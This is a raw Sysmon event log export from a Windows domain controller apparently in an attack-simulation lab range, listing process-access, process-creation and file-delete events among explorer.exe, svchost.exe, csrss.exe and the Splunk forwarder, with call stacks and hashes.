22:53:00.176{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+3d9ff|C:\Windows\System32\SHELL32.dll+3c95e|C:\Windows\System32\SHELL32.dll+3c1f0|C:\Windows\System32\SHELL32.dll+3aa7f|C:\Windows\System32\SHCORE.dll+333c9|C:\Windows\system32\explorerframe.dll+581c6|C:\Windows\system32\explorerframe.dll+3e2af|C:\Windows\system32\explorerframe.dll+3dbf8|C:\Windows\system32\explorerframe.dll+651a|C:\Windows\system32\explorerframe.dll+3bbe4|C:\Windows\system32\explorerframe.dll+3c041|C:\Windows\system32\explorerframe.dll+3b9bc|C:\Windows\system32\explorerframe.dll+3a347|C:\Windows\system32\explorerframe.dll+3cb5f|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7 10341000x80000000000000001695140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.176{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+3d9ff|C:\Windows\System32\SHELL32.dll+3c95e|C:\Windows\System32\SHELL32.dll+3c1f0|C:\Windows\System32\SHELL32.dll+3aa7f|C:\Windows\System32\SHCORE.dll+333c9|C:\Windows\system32\explorerframe.dll+581c6|C:\Windows\system32\explorerframe.dll+3e2af|C:\Windows\system32\explorerframe.dll+3dbf8|C:\Windows\system32\explorerframe.dll+651a|C:\Windows\system32\explorerframe.dll+3bbe4|C:\Windows\system32\explorerframe.dll+3c041|C:\Windows\system32\explorerframe.dll+3b9bc 10341000x80000000000000001695139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.176{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+3d9ff|C:\Windows\System32\SHELL32.dll+3c95e|C:\Windows\System32\SHELL32.dll+3c1f0|C:\Windows\System32\SHELL32.dll+3aa7f|C:\Windows\System32\SHCORE.dll+333c9|C:\Windows\system32\explorerframe.dll+581c6|C:\Windows\system32\explorerframe.dll+3e2af|C:\Windows\system32\explorerframe.dll+3dbf8|C:\Windows\system32\explorerframe.dll+651a|C:\Windows\system32\explorerframe.dll+3bbe4|C:\Windows\system32\explorerframe.dll+3c041|C:\Windows\system32\explorerframe.dll+3b9bc|C:\Windows\system32\explorerframe.dll+3a347 23542300x80000000000000001695138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.129{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=64B3EA0F0F0D43D452E3DBC74A041AE9,SHA256=8DA90B2F46731E0CE6241050D3E13D8280E4355D8BD324340E17413BC8D9F25F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.113{05ADC7E1-29F2-6039-CE05-00000000AD01}24643672C:\Windows\system32\taskhostw.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.113{05ADC7E1-29F2-6039-CE05-00000000AD01}24643672C:\Windows\system32\taskhostw.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.113{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+5cc7a|C:\Windows\system32\explorerframe.dll+5bf05|C:\Windows\system32\explorerframe.dll+5eb95|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+24f92|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F0189F6BC)|UNKNOWN(FFFF9F0F018B4B82)|UNKNOWN(FFFF9F0F018B747B)|UNKNOWN(FFFF9F0F018A41FC)|UNKNOWN(FFFF9F0F018A3E1D)|UNKNOWN(FFFF9F0F0189C761)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+1f44 10341000x80000000000000001695134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.098{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+5cc7a|C:\Windows\system32\explorerframe.dll+5bf05|C:\Windows\system32\explorerframe.dll+5eb95|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+24f92|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F0189F6BC)|UNKNOWN(FFFF9F0F018B4B82)|UNKNOWN(FFFF9F0F018B747B)|UNKNOWN(FFFF9F0F018A41FC)|UNKNOWN(FFFF9F0F018A3E1D)|UNKNOWN(FFFF9F0F0189C761)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+1f44 10341000x80000000000000001695133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.098{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+5cc7a|C:\Windows\system32\explorerframe.dll+5bf05|C:\Windows\system32\explorerframe.dll+5eb95|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+24f92|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F0189F6BC)|UNKNOWN(FFFF9F0F018B4B82)|UNKNOWN(FFFF9F0F018B747B)|UNKNOWN(FFFF9F0F018A41FC) 10341000x80000000000000001695132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.098{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+5cc7a|C:\Windows\system32\explorerframe.dll+5bf05|C:\Windows\system32\explorerframe.dll+5eb95|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+24f92|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F0189F6BC)|UNKNOWN(FFFF9F0F018B4B82)|UNKNOWN(FFFF9F0F018B747B)|UNKNOWN(FFFF9F0F018A41FC)|UNKNOWN(FFFF9F0F018A3E1D) 10341000x80000000000000001695131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.098{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+5d48a|C:\Windows\System32\SHELL32.dll+d2c54|C:\Windows\System32\SHELL32.dll+d04fb|C:\Windows\System32\SHELL32.dll+cffdd|C:\Windows\System32\SHELL32.dll+41a89|C:\Windows\system32\explorerframe.dll+19cfa|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.098{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+5d478|C:\Windows\System32\SHELL32.dll+d2c54|C:\Windows\System32\SHELL32.dll+d04fb|C:\Windows\System32\SHELL32.dll+cffdd|C:\Windows\System32\SHELL32.dll+41a89|C:\Windows\system32\explorerframe.dll+19cfa|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.098{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+5d478|C:\Windows\System32\SHELL32.dll+d2c54|C:\Windows\System32\SHELL32.dll+d04fb|C:\Windows\System32\SHELL32.dll+cffdd|C:\Windows\System32\SHELL32.dll+41a89|C:\Windows\system32\explorerframe.dll+19cfa|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.082{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.082{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.082{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.067{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.067{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.067{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.067{05ADC7E1-229F-6039-0C00-00000000AD01}5887412C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.067{05ADC7E1-229F-6039-0C00-00000000AD01}5887412C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.067{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.067{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.064{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001695117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.052{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-704C-603D-4388-00000000AD01}9024C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.035{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-704C-603D-4388-00000000AD01}9024C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.035{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-704C-603D-4388-00000000AD01}9024C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.020{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-704C-603D-4388-00000000AD01}9024C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 